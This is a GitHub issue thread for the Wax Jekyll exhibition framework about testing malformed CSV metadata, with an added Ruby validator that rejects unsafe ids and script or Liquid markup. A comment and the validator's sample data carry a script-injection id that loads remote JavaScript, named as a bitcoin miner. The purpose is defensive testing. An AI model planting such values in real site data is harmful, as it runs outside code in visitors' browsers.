minicomp / wax

Jekyll based framework for minimal exhibitions with IIIF 🐝
https://minicomp.github.io/wax/
MIT License
161 stars 84 forks

Test suite for bad metadata #118

Open bmschmidt opened 3 years ago

bmschmidt commented 3 years ago

This is low priority, but in the cases where people enter bad metadata in the Wax CSVs, it would be useful to have some kind of failure rather than inscrutably borked-up designs. I've been trying a few in the rubberstamp test site, but as I remove them from there, if you don't mind, I'll just document a few here.

The idea is not that Wax should actually handle these cases, but that it should break in a slightly less inscrutable way; ideally, probably, through either refusing to build at all or perhaps even through refusing to build a single item.

I can bundle these into a simple collection or something at some point.

bmschmidt commented 3 years ago

Starting with the most insane case because I need to remove it before I can figure anything else out. I promise they won't all be quite this esoteric.

I created a wax csv with one id that's supposed to be the Jekyll equivalent of little Bobby Tables: `%} <script src=http://benschmidt.org/mine_bitcoin_in_the_background.js></script> {%`. The expectation here was that the start of the id would shut down liquid tags. What's happening, though, is even weirder than that; the `{%` isn't closing anything, but the `</script>` is, and somehow a whole bunch of internal HTML is getting written out to the browser.

Solution: Beats me. I bet this problem would disappear with some more escaping, but it surely doesn't matter. The whole point of a static site is that you're not vulnerable to injection attacks. I'll try seeing later what happens if you have the string </script> in a label field rather than an ID, where someone might conceivably want to put it.

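A pre-build check of the kind the issue asks for, as an added example that is not Wax code and not part of the comments above: it rejects rows whose id falls outside an allow-list and rows whose other fields carry Liquid or script markup, so the build can stop or skip a single item with a readable message. The `pid` column name, the allow-list pattern, and the names `validate_metadata`, `SAFE_ID`, `RISKY_MARKUP` and `Problem` are assumptions made for illustration.

```ruby
require 'csv'

# Hypothetical allow-list for ids: they end up in URLs, file names and templates.
SAFE_ID = /\A[A-Za-z0-9][A-Za-z0-9_-]*\z/
# Markup that changes meaning when a field is interpolated into Liquid or HTML.
RISKY_MARKUP = /\{%|%\}|\{\{|\}\}|<\/?script/i

Problem = Struct.new(:row, :field, :message)

# Returns [buildable_rows, problems]. A row with any problem is withheld from
# the build; the caller can abort the whole build if problems is non-empty.
def validate_metadata(csv_text, id_field: 'pid')
  seen, good, problems = {}, [], []
  CSV.parse(csv_text, headers: true).each_with_index do |row, index|
    line = index + 2 # record number, counting the header as 1
    found = []
    id = row[id_field].to_s.strip
    if id.empty?
      found << Problem.new(line, id_field, 'missing id')
    elsif id !~ SAFE_ID
      found << Problem.new(line, id_field, "id #{id.inspect} has characters outside [A-Za-z0-9_-]")
    elsif seen.key?(id)
      found << Problem.new(line, id_field, "duplicate id #{id.inspect}, first seen on record #{seen[id]}")
    else
      seen[id] = line
    end
    row.each do |field, value|
      next if field == id_field || value.nil?
      found << Problem.new(line, field, 'contains Liquid or script markup') if value =~ RISKY_MARKUP
    end
    found.empty? ? good << row.to_h : problems.concat(found)
  end
  [good, problems]
end

# Constructed sample: record 3 has an id shaped like the one in the comment above.
SAMPLE = <<~CSV
  pid,label
  obj1,A plain record
  "%} <script src=http://example.invalid/x.js></script> {%",Bobby Tables
  obj1,Duplicate of the first id
  obj4,"Label with </script> in it"
CSV

if __FILE__ == $PROGRAM_NAME
  good, problems = validate_metadata(SAMPLE)
  problems.each { |pr| warn "record #{pr.row}, #{pr.field}: #{pr.message}" }
  puts "#{good.size} buildable, #{problems.size} problems"
end
```

Flagging markup in non-id fields is the strict choice here; a site that wants such text in labels would escape those fields at render time and keep only the id check as a hard failure.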